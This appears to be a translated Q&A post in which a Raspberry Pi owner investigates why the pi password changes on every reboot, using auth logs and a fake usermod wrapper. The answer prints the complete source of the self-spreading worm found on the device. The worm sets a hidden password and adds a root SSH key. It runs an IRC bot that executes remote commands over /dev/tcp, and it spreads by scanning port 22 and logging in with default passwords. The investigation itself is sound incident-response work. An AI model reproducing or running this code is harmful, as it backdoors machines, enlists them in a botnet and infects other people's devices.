我正在调查这个问题:每次重新启动时 pi 的密码都会丢失。问题摘要:通过 passwd 命令更改 pi 的密码 -> 重新启动 -> 更改后的密码总是会更改为我们不知道的另一个密码。
是的,我知道使用默认的 pi 帐户不利于安全,但在本主题中我只关注根本原因的调查。
在谷歌上搜索大量结果后(如下所示:https://raspberrypi.stackexchange.com/questions/73487/pis-password-is-lost-in-every-reboot和https://www.raspberrypi.org/forums/viewtopic.php?t=195378等等...)但没有解决这个勒死问题的方法,我决定自己调查。我已经找出了一半的根本原因。
我用这个命令来跟踪身份验证日志
sudo tail /var/log/auth.log -n 100
我总是在关闭步骤中看到此日志
May 19 01:02:41 raspberrypi usermod[866]: change user 'pi' password
然后我尝试重命名用户模式二进制和关闭
sudo mv /usr/sbin/usermod /usr/sbin/usermod-dell
然后它就工作了,usermod 二进制文件没有被调用,并且 pi 帐户的密码在重新启动后也没有更改。所以,这意味着一个叫做 usermod 的东西来更改 pi 帐户的密码,但我仍然无法准确追踪某物是什么?
这是完整的日志auth.log -n 100命令。
rp@raspberrypi:~ $ sudo tail /var/log/auth.log -n 100
[sudo] password for rp:
May 19 00:19:20 raspberrypi sudo: pam_unix(sudo:session): session closed for use r root
May 19 00:19:31 raspberrypi sudo: rp : TTY=pts/1 ; PWD=/home/rp ; USER=roo t ; COMMAND=/sbin/reboot
May 19 00:19:31 raspberrypi sudo: pam_unix(sudo:session): session opened for use r root by rp(uid=0)
May 19 00:19:38 raspberrypi systemd-logind[478]: New seat seat0.
May 19 00:19:39 raspberrypi sshd[847]: Server listening on 0.0.0.0 port 22.
May 19 00:19:39 raspberrypi sshd[847]: Server listening on :: port 22.
May 19 00:19:39 raspberrypi usermod[824]: change user 'pi' password
May 19 00:19:40 raspberrypi sshd[847]: Received SIGHUP; restarting.
May 19 00:19:41 raspberrypi sshd[847]: Server listening on 0.0.0.0 port 22.
May 19 00:19:41 raspberrypi sshd[847]: Server listening on :: port 22.
May 19 00:19:46 raspberrypi lightdm: pam_unix(lightdm-autologin:session): sessio n opened for user pi by (uid=0)
May 19 00:19:46 raspberrypi systemd-logind[478]: New session c1 of user pi.
May 19 00:19:46 raspberrypi systemd: pam_unix(systemd-user:session): session ope ned for user pi by (uid=0)
May 19 00:19:55 raspberrypi polkitd(authority=local): Registered Authentication Agent for unix-session:c1 (system bus name :1.12 [lxpolkit], object path /org/fr eedesktop/PolicyKit1/AuthenticationAgent, locale en_GB.UTF-8)
May 19 00:22:24 raspberrypi sudo: pi : TTY=pts/0 ; PWD=/home/pi ; USER=roo t ; COMMAND=/usr/local/bin/noip2 -S
May 19 00:22:24 raspberrypi sudo: pam_unix(sudo:session): session opened for use r root by (uid=0)
May 19 00:22:24 raspberrypi sudo: pam_unix(sudo:session): session closed for use r root
May 19 00:22:36 raspberrypi passwd[2138]: pam_unix(passwd:chauthtok): authentica tion failure; logname= uid=1000 euid=0 tty= ruser= rhost= user=pi
May 19 00:22:47 raspberrypi sudo: pi : TTY=pts/0 ; PWD=/home/pi ; USER=roo t ; COMMAND=/usr/bin/passwd pi
May 19 00:22:47 raspberrypi sudo: pam_unix(sudo:session): session opened for use r root by (uid=0)
May 19 00:22:55 raspberrypi passwd[2152]: pam_unix(passwd:chauthtok): password c hanged for pi
May 19 00:22:55 raspberrypi sudo: pam_unix(sudo:session): session closed for use r root
May 19 00:23:11 raspberrypi passwd[2163]: pam_unix(passwd:chauthtok): password c hanged for pi
May 19 00:24:04 raspberrypi passwd[2235]: pam_unix(passwd:chauthtok): authentica tion failure; logname= uid=1000 euid=0 tty= ruser= rhost= user=pi
May 19 00:24:43 raspberrypi passwd[2254]: pam_unix(passwd:chauthtok): password c hanged for pi
May 19 00:24:49 raspberrypi sudo: pi : TTY=pts/0 ; PWD=/home/pi ; USER=roo t ; COMMAND=/sbin/reboot
May 19 00:24:50 raspberrypi sudo: pam_unix(sudo:session): session opened for use r root by (uid=0)
May 19 00:24:57 raspberrypi systemd-logind[477]: New seat seat0.
May 19 00:24:58 raspberrypi sshd[881]: Server listening on 0.0.0.0 port 22.
May 19 00:24:58 raspberrypi sshd[881]: Server listening on :: port 22.
May 19 00:24:58 raspberrypi usermod[861]: change user 'pi' password
May 19 00:25:03 raspberrypi lightdm: pam_unix(lightdm-autologin:session): sessio n opened for user pi by (uid=0)
May 19 00:25:04 raspberrypi systemd-logind[477]: New session c1 of user pi.
May 19 00:25:04 raspberrypi systemd: pam_unix(systemd-user:session): session ope ned for user pi by (uid=0)
May 19 00:25:11 raspberrypi polkitd(authority=local): Registered Authentication Agent for unix-session:c1 (system bus name :1.12 [lxpolkit], object path /org/fr eedesktop/PolicyKit1/AuthenticationAgent, locale en_GB.UTF-8)
May 19 00:26:56 raspberrypi passwd[2064]: pam_unix(passwd:chauthtok): authentica tion failure; logname= uid=1000 euid=0 tty= ruser= rhost= user=pi
May 19 00:27:10 raspberrypi passwd[2068]: pam_unix(passwd:chauthtok): authentica tion failure; logname= uid=1000 euid=0 tty= ruser= rhost= user=pi
May 19 00:39:01 raspberrypi CRON[8534]: pam_unix(cron:session): session opened f or user root by (uid=0)
May 19 00:39:02 raspberrypi CRON[8534]: pam_unix(cron:session): session closed f or user root
May 19 00:44:32 raspberrypi sshd[9696]: pam_unix(sshd:auth): authentication fail ure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.1.155 user=rp
May 19 00:44:34 raspberrypi sshd[9696]: Failed password for rp from 192.168.1.15 5 port 51768 ssh2
May 19 00:44:41 raspberrypi sshd[9696]: Accepted password for rp from 192.168.1. 155 port 51768 ssh2
May 19 00:44:41 raspberrypi sshd[9696]: pam_unix(sshd:session): session opened f or user rp by (uid=0)
May 19 00:44:41 raspberrypi systemd-logind[477]: New session c2 of user rp.
May 19 00:44:41 raspberrypi systemd: pam_unix(systemd-user:session): session ope ned for user rp by (uid=0)
May 19 00:44:57 raspberrypi sudo: pam_unix(sudo:auth): authentication failure; l ogname=rp uid=1003 euid=0 tty=/dev/pts/1 ruser=rp rhost= user=rp
May 19 00:45:03 raspberrypi sudo: rp : TTY=pts/1 ; PWD=/home/rp ; USER=roo t ; COMMAND=/usr/sbin/update-rc.d noip2.sh enable
May 19 00:45:03 raspberrypi sudo: pam_unix(sudo:session): session opened for use r root by rp(uid=0)
May 19 00:45:04 raspberrypi sudo: pam_unix(sudo:session): session closed for use r root
May 19 00:45:36 raspberrypi smbd[10031]: pam_unix(samba:session): session opened for user pi by (uid=0)
May 19 00:46:55 raspberrypi sudo: rp : TTY=pts/1 ; PWD=/home/rp ; USER=roo t ; COMMAND=/usr/local/bin/noip2 -S
May 19 00:46:55 raspberrypi sudo: pam_unix(sudo:session): session opened for use r root by rp(uid=0)
May 19 00:46:55 raspberrypi sudo: pam_unix(sudo:session): session closed for use r root
May 19 00:49:17 raspberrypi sudo: rp : TTY=pts/1 ; PWD=/home/rp ; USER=roo t ; COMMAND=/usr/bin/tail /var/log/auth.log -n 100
May 19 00:49:17 raspberrypi sudo: pam_unix(sudo:session): session opened for use r root by rp(uid=0)
May 19 00:49:17 raspberrypi sudo: pam_unix(sudo:session): session closed for use r root
May 19 00:51:24 raspberrypi sudo: rp : TTY=pts/1 ; PWD=/home/rp ; USER=roo t ; COMMAND=/usr/bin/passwd pi
May 19 00:51:24 raspberrypi sudo: pam_unix(sudo:session): session opened for use r root by rp(uid=0)
May 19 00:51:30 raspberrypi passwd[11384]: pam_unix(passwd:chauthtok): password changed for pi
May 19 00:51:30 raspberrypi sudo: pam_unix(sudo:session): session closed for use r root
May 19 00:51:39 raspberrypi sudo: rp : TTY=pts/1 ; PWD=/home/rp ; USER=roo t ; COMMAND=/sbin/reboot
May 19 00:51:39 raspberrypi sudo: pam_unix(sudo:session): session opened for use r root by rp(uid=0)
May 19 00:51:39 raspberrypi sshd[9696]: pam_unix(sshd:session): session closed f or user rp
May 19 00:51:47 raspberrypi systemd-logind[475]: New seat seat0.
May 19 00:51:48 raspberrypi sshd[882]: Server listening on 0.0.0.0 port 22.
May 19 00:51:48 raspberrypi sshd[882]: Server listening on :: port 22.
May 19 00:51:48 raspberrypi usermod[859]: change user 'pi' password
May 19 00:51:55 raspberrypi lightdm: pam_unix(lightdm-autologin:session): sessio n opened for user pi by (uid=0)
May 19 00:51:55 raspberrypi systemd-logind[475]: New session c1 of user pi.
May 19 00:51:55 raspberrypi systemd: pam_unix(systemd-user:session): session ope ned for user pi by (uid=0)
May 19 00:52:01 raspberrypi polkitd(authority=local): Registered Authentication Agent for unix-session:c1 (system bus name :1.12 [lxpolkit], object path /org/fr eedesktop/PolicyKit1/AuthenticationAgent, locale en_GB.UTF-8)
May 19 00:54:58 raspberrypi sshd[2091]: Accepted password for rp from 192.168.1. 155 port 51869 ssh2
May 19 00:54:58 raspberrypi sshd[2091]: pam_unix(sshd:session): session opened f or user rp by (uid=0)
May 19 00:54:58 raspberrypi systemd-logind[475]: New session c2 of user rp.
May 19 00:54:58 raspberrypi systemd: pam_unix(systemd-user:session): session ope ned for user rp by (uid=0)
May 19 00:55:08 raspberrypi sudo: rp : TTY=pts/0 ; PWD=/home/rp ; USER=roo t ; COMMAND=/usr/bin/tail /var/log/auth.log -n 100
May 19 00:55:08 raspberrypi sudo: pam_unix(sudo:session): session opened for use r root by rp(uid=0)
May 19 00:55:08 raspberrypi sudo: pam_unix(sudo:session): session closed for use r root
May 19 01:02:21 raspberrypi sudo: rp : TTY=pts/0 ; PWD=/home/rp ; USER=roo t ; COMMAND=/usr/local/bin/noip2 -S
May 19 01:02:21 raspberrypi sudo: pam_unix(sudo:session): session opened for use r root by rp(uid=0)
May 19 01:02:21 raspberrypi sudo: pam_unix(sudo:session): session closed for use r root
May 19 01:02:33 raspberrypi sudo: rp : TTY=pts/0 ; PWD=/home/rp ; USER=roo t ; COMMAND=/sbin/reboot
May 19 01:02:33 raspberrypi sudo: pam_unix(sudo:session): session opened for use r root by rp(uid=0)
May 19 01:02:33 raspberrypi sshd[2091]: pam_unix(sshd:session): session closed f or user rp
May 19 01:02:33 raspberrypi sudo: pam_unix(sudo:session): session closed for use r root
May 19 01:02:33 raspberrypi polkitd(authority=local): Unregistered Authenticatio n Agent for unix-session:c1 (system bus name :1.12, object path /org/freedesktop /PolicyKit1/AuthenticationAgent, locale en_GB.UTF-8) (disconnected from bus)
May 19 01:02:40 raspberrypi systemd-logind[480]: New seat seat0.
May 19 01:02:41 raspberrypi sshd[879]: Server listening on 0.0.0.0 port 22.
May 19 01:02:41 raspberrypi sshd[879]: Server listening on :: port 22.
May 19 01:02:41 raspberrypi usermod[866]: change user 'pi' password
May 19 01:02:47 raspberrypi lightdm: pam_unix(lightdm-autologin:session): sessio n opened for user pi by (uid=0)
May 19 01:02:47 raspberrypi systemd-logind[480]: New session c1 of user pi.
May 19 01:02:47 raspberrypi systemd: pam_unix(systemd-user:session): session ope ned for user pi by (uid=0)
May 19 01:02:53 raspberrypi polkitd(authority=local): Registered Authentication Agent for unix-session:c1 (system bus name :1.12 [lxpolkit], object path /org/fr eedesktop/PolicyKit1/AuthenticationAgent, locale en_GB.UTF-8)
May 19 01:04:53 raspberrypi sshd[2010]: Accepted password for rp from 192.168.1. 155 port 51907 ssh2
May 19 01:04:53 raspberrypi sshd[2010]: pam_unix(sshd:session): session opened f or user rp by (uid=0)
May 19 01:04:53 raspberrypi systemd-logind[480]: New session c2 of user rp.
May 19 01:04:53 raspberrypi systemd: pam_unix(systemd-user:session): session ope ned for user rp by (uid=0)
May 19 01:05:01 raspberrypi sudo: rp : TTY=pts/0 ; PWD=/home/rp ; USER=roo t ; COMMAND=/usr/bin/tail /var/log/auth.log -n 100
May 19 01:05:01 raspberrypi sudo: pam_unix(sudo:session): session opened for use
我尝试在下面创建一个假的 usermod bash 来调试
#!/bin/bash
(
echo "usermod called at $(date)"
echo "env"
env
echo
echo "command line"
echo "$@"
) >>/tmp/usermod.log
这是日志结果,但不幸的是我仍然无法准确追踪所谓的 usermod?
usermod called at Sun 19 May 10:03:01 +07 2019
env
TERM=linux
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PWD=/
LANG=en_GB.UTF-8
SHLVL=2
_=/usr/bin/env
command line
-p $6$vGkGPKUr$heqvOhUzvbQ66Nb0JGCijh/81sG1WACcZgzPn8A0Wn58hHXWqy5yOgTlYJEbOjhk$
答案1
我终于喜欢上了它!! Windows Defender 警告我这个 bash 是病毒。
我在下面使用 bash 来调试所谓的 usermod。
#!/bin/bash
(
echo "usermod called at $(date)"
echo "env"
env
ps -p $PPID -o ruser,pid,ppid,cmd
echo
echo "command line"
echo "$@"
) >>/tmp/usermod.log
这就是结果
usermod called at Sun 19 May 14:26:41 +07 2019
env
TERM=linux
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PWD=/
LANG=en_GB.UTF-8
SHLVL=2
_=/usr/bin/env
RUSER PID PPID CMD
root 597 590 /bin/bash /opt/M8Zsr10D
command line
-p $6$vGkGPKUr$heqvOhUzvbQ66Nb0JGCijh/81sG1WACcZgzPn8A0Wn58hHXWqy5yOgTlYJEbOjhkHD0MRsAkfJgjU/ioCYDeR1 pi
/opt/M8Zsr10D 内容
#!/bin/bash
MYSELF=`realpath $0`
DEBUG=/dev/null
echo $MYSELF >> $DEBUG
if [ "$EUID" -ne 0 ]
then
NEWMYSELF=`mktemp -u 'XXXXXXXX'`
sudo cp $MYSELF /opt/$NEWMYSELF
sudo sh -c "echo '#!/bin/sh -e' > /etc/rc.local"
sudo sh -c "echo /opt/$NEWMYSELF >> /etc/rc.local"
sudo sh -c "echo 'exit 0' >> /etc/rc.local"
sleep 1
sudo reboot
else
TMP1=`mktemp`
echo $TMP1 >> $DEBUG
killall bins.sh
killall minerd
killall node
killall nodejs
killall ktx-armv4l
killall ktx-i586
killall ktx-m68k
killall ktx-mips
killall ktx-mipsel
killall ktx-powerpc
killall ktx-sh4
killall ktx-sparc
killall arm5
killall zmap
killall kaiten
killall perl
echo "127.0.0.1 bins.deutschland-zahlung.eu" >> /etc/hosts
rm -rf /root/.bashrc
rm -rf /home/pi/.bashrc
usermod -p \$6\$vGkGPKUr\$heqvOhUzvbQ66Nb0JGCijh/81sG1WACcZgzPn8A0Wn58hHXWqy5yOgTlYJEbOjhkHD0MRsAkfJgjU/ioCYDeR1 pi
mkdir -p /root/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCl0kIN33IJISIufmqpqg54D6s4J0L7XV2kep0rNzgY1S1IdE8HDef7z1ipBVuGTygGsq+x4yVnxveGshVP48YmicQHJMCIljmn6Po0RMC48qihm/9ytoEYtkKkeiTR02c6DyIcDnX3QdlSmEqPqSNRQ/XDgM7qIB/VpYtAhK/7DoE8pqdoFNBU5+JlqeWYpsMO+qkHugKA5U22wEGs8xG2XyyDtrBcw10xz+M7U8Vpt0tEadeV973tXNNNpUgYGIFEsrDEAjbMkEsUw+iQmXg37EusEFjCVjBySGH3F+EQtwin3YmxbB9HRMzOIzNnXwCFaYU5JjTNnzylUBp/XB6B" >> /root/.ssh/authorized_keys
echo "nameserver 8.8.8.8" >> /etc/resolv.conf
rm -rf /tmp/ktx*
rm -rf /tmp/cpuminer-multi
rm -rf /var/tmp/kaiten
cat > /tmp/public.pem <<EOFMARKER
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC/ihTe2DLmG9huBi9DsCJ90MJs
glv7y530TWw2UqNtKjPPA1QXvNsWdiLpTzyvk8mv6ObWBF8hHzvyhJGCadl0v3HW
rXneU1DK+7iLRnkI4PRYYbdfwp92nRza00JUR7P4pghG5SnRK+R/579vIiy+1oAF
WRq+Z8HYMvPlgSRA3wIDAQAB
-----END PUBLIC KEY-----
EOFMARKER
BOT=`mktemp -u 'XXXXXXXX'`
cat > /tmp/$BOT <<'EOFMARKER'
#!/bin/bash
SYS=`uname -a | md5sum | awk -F' ' '{print $1}'`
NICK=a${SYS:24}
while [ true ]; do
arr[0]="ix1.undernet.org"
arr[1]="ix2.undernet.org"
arr[2]="Ashburn.Va.Us.UnderNet.org"
arr[3]="Bucharest.RO.EU.Undernet.Org"
arr[4]="Budapest.HU.EU.UnderNet.org"
arr[5]="Chicago.IL.US.Undernet.org"
rand=$[$RANDOM % 6]
svr=${arr[$rand]}
eval 'exec 3<>/dev/tcp/$svr/6667;'
if [[ ! "$?" -eq 0 ]] ; then
continue
fi
echo $NICK
eval 'printf "NICK $NICK\r\n" >&3;'
if [[ ! "$?" -eq 0 ]] ; then
continue
fi
eval 'printf "USER user 8 * :IRC hi\r\n" >&3;'
if [[ ! "$?" -eq 0 ]] ; then
continue
fi
# Main loop
while [ true ]; do
eval "read msg_in <&3;"
if [[ ! "$?" -eq 0 ]] ; then
break
fi
if [[ "$msg_in" =~ "PING" ]] ; then
printf "PONG %s\n" "${msg_in:5}";
eval 'printf "PONG %s\r\n" "${msg_in:5}" >&3;'
if [[ ! "$?" -eq 0 ]] ; then
break
fi
sleep 1
eval 'printf "JOIN #biret\r\n" >&3;'
if [[ ! "$?" -eq 0 ]] ; then
break
fi
elif [[ "$msg_in" =~ "PRIVMSG" ]] ; then
privmsg_h=$(echo $msg_in| cut -d':' -f 3)
privmsg_data=$(echo $msg_in| cut -d':' -f 4)
privmsg_nick=$(echo $msg_in| cut -d':' -f 2 | cut -d'!' -f 1)
hash=`echo $privmsg_data | base64 -d -i | md5sum | awk -F' ' '{print $1}'`
sign=`echo $privmsg_h | base64 -d -i | openssl rsautl -verify -inkey /tmp/public.pem -pubin`
if [[ "$sign" == "$hash" ]] ; then
CMD=`echo $privmsg_data | base64 -d -i`
RES=`bash -c "$CMD" | base64 -w 0`
eval 'printf "PRIVMSG $privmsg_nick :$RES\r\n" >&3;'
if [[ ! "$?" -eq 0 ]] ; then
break
fi
fi
fi
done
done
EOFMARKER
chmod +x /tmp/$BOT
nohup /tmp/$BOT 2>&1 > /tmp/bot.log &
rm /tmp/nohup.log -rf
rm -rf nohup.out
sleep 3
rm -rf /tmp/$BOT
NAME=`mktemp -u 'XXXXXXXX'`
date > /tmp/.s
apt-get update -y --force-yes
apt-get install zmap sshpass -y --force-yes
while [ true ]; do
FILE=`mktemp`
zmap -p 22 -o $FILE -n 100000
killall ssh scp
for IP in `cat $FILE`
do
sshpass -praspberry scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $MYSELF pi@$IP:/tmp/$NAME && echo $IP >> /opt/.r && sshpass -praspberry ssh pi@$IP -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "cd /tmp && chmod +x $NAME && bash -c ./$NAME" &
sshpass -praspberryraspberry993311 scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $MYSELF pi@$IP:/tmp/$NAME && echo $IP >> /opt/.r && sshpass -praspberryraspberry993311 ssh pi@$IP -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "cd /tmp && chmod +x $NAME && bash -c ./$NAME" &
done
rm -rf $FILE
sleep 10
done
fi